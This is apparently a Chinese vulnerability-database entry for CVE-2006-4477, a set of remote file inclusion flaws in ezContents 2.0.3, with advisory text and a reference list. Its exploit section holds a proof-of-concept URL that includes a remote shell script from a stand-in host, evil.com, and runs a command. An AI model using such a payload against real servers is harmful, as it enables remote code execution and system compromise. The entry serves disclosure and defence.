Visualshapers EzContents GLOBALS[rootdp]参数多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110920 漏洞类型 输入验证
发布时间 2006-08-30 更新时间 2006-09-15
CVE编号 CVE-2006-4477 CNNVD-ID CNNVD-200608-497
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28462
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-497
|漏洞详情
VisualShapersezContents2.0.3中存在多个PHP远程文件包含漏洞,远程攻击者可借助一个空GLOBALS[rootdp]参数和以下参数中的ftpsURL来执行任意PHP代码:(1)(a)diary/event_list.php,(b)gallery/gallery_summary.php,(c)guestbook/showguestbook.php,(d)links/showlinks.php和(e)reviews/review_summary.php脚本中的GLOBALS[admin_home]参数;以及(2)(f)calendar/calendar.php,(g)news/shownews.php,(h)poll/showpoll.php,(i)search/search.php,(j)toprated/toprated.php和(k)whatsnew/whatsnew.php脚本中的GLOBALS[language_home]参数。
|漏洞EXP
source: http://www.securityfocus.com/bid/19776/info
         
ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
         
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
 
http://www.example.com/modules/toprated/toprated.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
|参考资料

来源:XF
名称:ezcontents-multiple-scripts-file-include(28674)
链接:http://xforce.iss.net/xforce/xfdb/28674
来源:BID
名称:19776
链接:http://www.securityfocus.com/bid/19776
来源:BUGTRAQ
名称:20060830ezContentsVersion2.0.3Remote/LocalFileInclusion,SQLInjection,XSS
链接:http://www.securityfocus.com/archive/1/archive/1/444779/100/0/threaded
来源:OSVDB
名称:28331
链接:http://www.osvdb.org/28331
来源:OSVDB
名称:28330
链接:http://www.osvdb.org/28330
来源:OSVDB
名称:28329
链接:http://www.osvdb.org/28329
来源:OSVDB
名称:28328
链接:http://www.osvdb.org/28328
来源:OSVDB
名称:28327
链接:http://www.osvdb.org/28327
来源:OSVDB
名称:28326
链接:http://www.osvdb.org/28326
来源:OSVDB
名称:28325
链接:http://www.osvdb.org/28325
来源:OSVDB
名称:28324
链接:http://www.osvdb.org/28324
来源:OSVDB
名称:28323
链接:http://www.osvdb.org/28323
来源:OSVDB
名称:28322
链接:http://www.osvdb.org/28322
来源:OSVDB
名称:28321
链接:http://www.osvdb.org/28321
来源:VUPEN
名称:ADV-2006-3420
链接:http://www.frsirt.com/english/advisories/2006/3420
来源:SECTRACK
名称:1016770
链接:http://securitytracker.com/id?1016770
来源:SECUN